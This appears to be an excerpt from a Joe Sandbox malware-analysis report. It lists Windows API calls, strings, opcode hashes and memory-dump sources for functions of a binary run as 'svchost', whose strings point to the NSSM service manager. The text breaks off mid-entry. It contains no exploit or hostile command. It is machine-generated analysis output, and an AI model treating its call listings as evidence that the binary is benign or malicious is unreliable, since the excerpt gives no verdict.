                                                    • Opcode Fuzzy Hash: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
                                                    • Instruction Fuzzy Hash: 6B41B7B1A04300EBD620DF65DD85F9B73A8FB84714F104A2EB669932C0E778E954CB69
                                                    APIs
                                                      • Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                      • Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                      • Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                      • Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC
                                                    • MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
                                                    • __strftime_l.LIBCMT ref: 00405516
                                                    • LocalFree.KERNEL32(00000000), ref: 00405523
                                                    • MessageBoxW.USER32(00000000,The message which was supposed to go here is too big!,NSSM,00000030), ref: 00405537
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Message$FormatHeap$AllocDefaultFreeLangLocalProcessUser__snwprintf_s__strftime_l
                                                    • String ID: ($NSSM$The message which was supposed to go here is missing!$The message which was supposed to go here is too big!$e
                                                    • API String ID: 3053442334-353540380
                                                    • Opcode ID: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
                                                    • Instruction ID: 9a0a8de4c5d0dfbf6e97c11b6962cbdff5b354b3c8bec1d6dae1fd1358dc6512
                                                    • Opcode Fuzzy Hash: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
                                                    • Instruction Fuzzy Hash: EB315EB1905301AFD350DF29D845B9FBBE4EF88354F40493EF959D2241E7788648CB9A
                                                    APIs
                                                    • QueryServiceConfig2W.ADVAPI32(00000002,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000002,0040DDED,00000002,?,00000000,00008400), ref: 0040D6D3
                                                    • GetLastError.KERNEL32 ref: 0040D6DB
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6ED
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D6F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                    • String ID: SERVICE_CONFIG_DELAYED_AUTO_START_INFO$SERVICE_DELAYED_AUTO_START_INFO$get_service_startup()
                                                    • API String ID: 2527037045-1869567720
                                                    • Opcode ID: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
                                                    • Instruction ID: 097b29a2a90f646509759188dcc962e1ab6821ba756d97a4ddf6cf1ac72e26d1
                                                    • Opcode Fuzzy Hash: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
                                                    • Instruction Fuzzy Hash: B531D4F6A403016BE310DFA9DC89FAB7798EB84315F54487AF504E7281E778E8448A69
                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,00000000,00000000), ref: 0040915B
                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001,?,?,00000000,00000000), ref: 0040916C
                                                    • GetProcessHeap.KERNEL32(00000008,00000030), ref: 00409176
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040917D
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 004091A9
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008D50,00000000,00000000,?), ref: 00409222
                                                    • GetLastError.KERNEL32(00000000), ref: 0040922F
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409250
                                                    • HeapFree.KERNEL32(00000000), ref: 00409257
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
                                                    • String ID: create_logging_thread()$logger
                                                    • API String ID: 3682172063-2332508298
                                                    • Opcode ID: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
                                                    • Instruction ID: 7a5f417da971cce8bdb4d489e7d561c2bea4d1d3adffcb45d960dbf457daacd4
                                                    • Opcode Fuzzy Hash: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
                                                    • Instruction Fuzzy Hash: 5731A0B1A00701AFD3209F65DC49F9BB7E8EF88714F10892EF649E7291D674E8408B59
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040A1EA
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A1F6
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • Thread32First.KERNEL32 ref: 0040A24E
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A258
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A27D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterFirstHandleLocalRegisterReportSnapshotThread32Toolhelp32Value
                                                    • String ID:
                                                    • API String ID: 414364297-0
                                                    • Opcode ID: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
                                                    • Instruction ID: 89f48a4cf6a9a6b2169b356681f18064eeb06023b63748c5040493b97caa791b
                                                    • Opcode Fuzzy Hash: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
                                                    • Instruction Fuzzy Hash: 9131B6B1504300AFD300EF659D45FAB77E8EF84318F84487EF549E3282E634E9158BAA
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040E8A3
                                                    • __snwprintf_s.LIBCMT ref: 0040E8ED
                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E921
                                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 0040E95C
                                                    • SetServiceStatus.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E97A
                                                    • SleepConditionVariableCS.KERNELBASE(?,?,?), ref: 0040E998
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E99F
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9C4
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSectionSleep__snwprintf_s$ConditionEnterLeaveObjectServiceSingleStatusTimerVariableWaitWaitable
                                                    • String ID: %lu
                                                    • API String ID: 418212672-685833217
                                                    • Opcode ID: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
                                                    • Instruction ID: 0bcbe74f60e49559a2a01a7623a54cf792aad81448e6a6f2708ebc24a96566d6
                                                    • Opcode Fuzzy Hash: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
                                                    • Instruction Fuzzy Hash: 5141DCF1A04700EBD7249B25CC46BDB73D4BB88314F508B2EF25EA61C0E67CA945C759
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00410E22
                                                    • HeapFree.KERNEL32(00000000), ref: 00410E29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: AppEnvironment
                                                    • API String ID: 3859560861-948859433
                                                    • Opcode ID: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
                                                    • Instruction ID: d0ab22901641b4708907b5ad450eb196165ffe8a0ecf88f64d9a13dda8279097
                                                    • Opcode Fuzzy Hash: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
                                                    • Instruction Fuzzy Hash: 724106B2A042016BE2009B69EC09FEB37A8DFC4725F14492EF515D62D1DBB8D8C5C76A
                                                    APIs
                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,0040DD63,00000003,00000000,00000002,?,0040DD63,00000002,00000000), ref: 0040CD48
                                                    • GetLastError.KERNEL32(?,0040DD63,00000002,00000000), ref: 0040CD50
                                                    • GetProcessHeap.KERNEL32(00000008,0040DD63,00000000,?,0040DD63,00000002,00000000), ref: 0040CD63
                                                    • HeapAlloc.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CD6A
                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,0040DD63,00000002,00000000), ref: 0040CD94
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DD63,00000002,00000000), ref: 0040CD9C
                                                    • HeapFree.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDA3
                                                    • GetLastError.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
                                                    • String ID: QUERY_SERVICE_CONFIG$query_service_config()
                                                    • API String ID: 2921672788-976127789
                                                    • Opcode ID: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
                                                    • Instruction ID: ec6184287c6e1aa3659987899a8ea3cdc59ea47e861b503f6ba41a7943c46725
                                                    • Opcode Fuzzy Hash: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
                                                    • Instruction Fuzzy Hash: 3F21D5F2A452017BE600A7A5EC8AFBF775CEFC5329F10893AF605D3181DA78D8049679
                                                    APIs
                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00404FBB
                                                    • GetLastError.KERNEL32(00000000), ref: 00404FC8
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404FFB
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404FFE
                                                    Strings
                                                    • expand_environment_string, xrefs: 0040500B
                                                    • ExpandEnvironmentStrings(), xrefs: 00405010
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$AllocHeapSource$DeregisterEnvironmentErrorExpandLastLocalProcessRegisterReportStringsValue
                                                    • String ID: ExpandEnvironmentStrings()$expand_environment_string
                                                    • API String ID: 834161584-2090451141
                                                    • Opcode ID: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
                                                    • Instruction ID: 1c240b0065301ebdc15cfa0ece81b4dfea20bbf87cc1a9778ddf823e08b6aba0
                                                    • Opcode Fuzzy Hash: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
                                                    • Instruction Fuzzy Hash: AF11B2F2A416017BE21026B5BC4AFEB771CDB8076AF114472FA05E2182EA79C54045B9
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000016), ref: 0040E620
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E623
                                                    • __snwprintf_s.LIBCMT ref: 0040E658
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E682
                                                    • HeapFree.KERNEL32(00000000), ref: 0040E685
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E6C4
                                                    • HeapFree.KERNEL32(00000000), ref: 0040E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$EventProcess$FreeSource$AllocDeregisterRegisterReport__snwprintf_s
                                                    • String ID: 0x%08x$control code$log_service_control()
                                                    • API String ID: 844069407-2089045330
                                                    • Opcode ID: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
                                                    • Instruction ID: 612ea0ede9ba1e7cb3a868644965a314014b177a7dd95aa26f1d9d3cb81d428a
                                                    • Opcode Fuzzy Hash: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
                                                    • Instruction Fuzzy Hash: 6211CBF2B4031037E62062676C46FDF2648CB90BAAF550976FA09B61C2D5BD8C5141BD
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 00408511
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$CreationDisposition$FlagsAndAttributes$ShareMode$get_createfile_parameters()
                                                    • API String ID: 2445375048-825329064
                                                    • Opcode ID: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
                                                    • Instruction ID: d5bcaed63e337bfabc806c2c34b187c565ea729d6d27f924a01f1bb630a1831b
                                                    • Opcode Fuzzy Hash: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
                                                    • Instruction Fuzzy Hash: D0511AB27443001BD200A61A9D43FEFB3D4AB98779FD4052FF649E62C1FA7DD580869A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %c%u
                                                    • API String ID: 0-883269693
                                                    • Opcode ID: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
                                                    • Instruction ID: fcb05bf5aa25034c6b283f3d3c8d8d5dbfc9814c65828dd12b5a4fa76bd1d4d2
                                                    • Opcode Fuzzy Hash: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
                                                    • Instruction Fuzzy Hash: 5A51BE729443058BD324DF68E8C57ABB3E5FB84310F544A3EE854D33A0E77A98458A9A
                                                    APIs
                                                    • TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
                                                    • LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                    • TlsSetValue.KERNEL32(00000014,00000000,?,00401042,00000000,00000000), ref: 004052F5
                                                    • GetUserDefaultLangID.KERNEL32(00000000,0000FFFF,00000000,?,?,?,00401042,00000000,00000000), ref: 00405305
                                                    • FormatMessageW.KERNEL32(00001200,00000000,?,?,?,?,?,00401042,00000000,00000000), ref: 00405321
                                                    • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,00000000,0000FFFF,00000000,?,?,?,?,00401042,00000000,00000000), ref: 00405336
                                                    • __snwprintf_s.LIBCMT ref: 0040534A
                                                    Strings
                                                    • <out of memory for error message>, xrefs: 004052E6
                                                    • system error %lu, xrefs: 0040533D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FormatMessageValue$AllocDefaultLangLocalUser__snwprintf_s
                                                    • String ID: <out of memory for error message>$system error %lu
                                                    • API String ID: 1317610408-3923297632
                                                    • Opcode ID: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
                                                    • Instruction ID: f23edb150031ebe2e0488c34495c660aa377f69acf961f8f06e15d9152bb88fb
                                                    • Opcode Fuzzy Hash: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
                                                    • Instruction Fuzzy Hash: 630180B2B4472377E23066657C05EBB2B58DF86BA5F144276FE20E62D0D978CC0195AC
                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,768704E0,?,00000000), ref: 0040FC4F
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0040FC6B
                                                    • CloseHandle.KERNEL32(?), ref: 0040FC92
                                                    • __snwprintf_s.LIBCMT ref: 0040FCB9
                                                    • __wcsnicmp.LIBCMT ref: 0040FD5A
                                                    • Sleep.KERNEL32(00007530), ref: 0040FDD8
                                                    • Sleep.KERNEL32(000000FF), ref: 0040FE22
                                                      • Part of subcall function 00409FC0: GetProcessTimes.KERNEL32(?,?,?,?,?), ref: 00409FDC
                                                      • Part of subcall function 00409FC0: GetLastError.KERNEL32(00000000), ref: 00409FE7
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                      • Part of subcall function 0040E6E0: UnregisterWait.KERNEL32(?), ref: 0040E6FB
                                                      • Part of subcall function 0040E6E0: SetServiceStatus.ADVAPI32(?,?), ref: 0040E785
                                                      • Part of subcall function 0040E6E0: SetServiceStatus.ADVAPI32(?,?,?,00000001), ref: 0040E823
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$ProcessServiceSleepSourceStatusTime$CloseCodeDeregisterErrorExitFileHandleLastRegisterReportSystemTimesUnregisterWait__snwprintf_s__wcsnicmp
                                                    • String ID: %lu
                                                    • API String ID: 613531104-685833217
                                                    • Opcode ID: 9574b5d5100c4da6b46ff8a507994b92466411802de88de43b15cd9b3701a9b8
                                                    • Instruction ID: b1cca182276ff02709501da2bb93ad667c3ccdeb18173aa65ccdb91ba50f2597
                                                    • Opcode Fuzzy Hash: 9574b5d5100c4da6b46ff8a507994b92466411802de88de43b15cd9b3701a9b8
                                                    • Instruction Fuzzy Hash: 1971FDB1504304AFE320DB55DC46FEB77A8EB84308F44493EF75A522C1E779A948C7A9
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040A083
                                                    • __snwprintf_s.LIBCMT ref: 0040A0A1
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A0AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastOpenProcess__snwprintf_s
                                                    • String ID: %lu
                                                    • API String ID: 1619034979-685833217
                                                    • Opcode ID: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
                                                    • Instruction ID: 8f5ceacfd598cb2394abf54756f4a9d9aecdfdb9d28b481e073514ca66ad884b
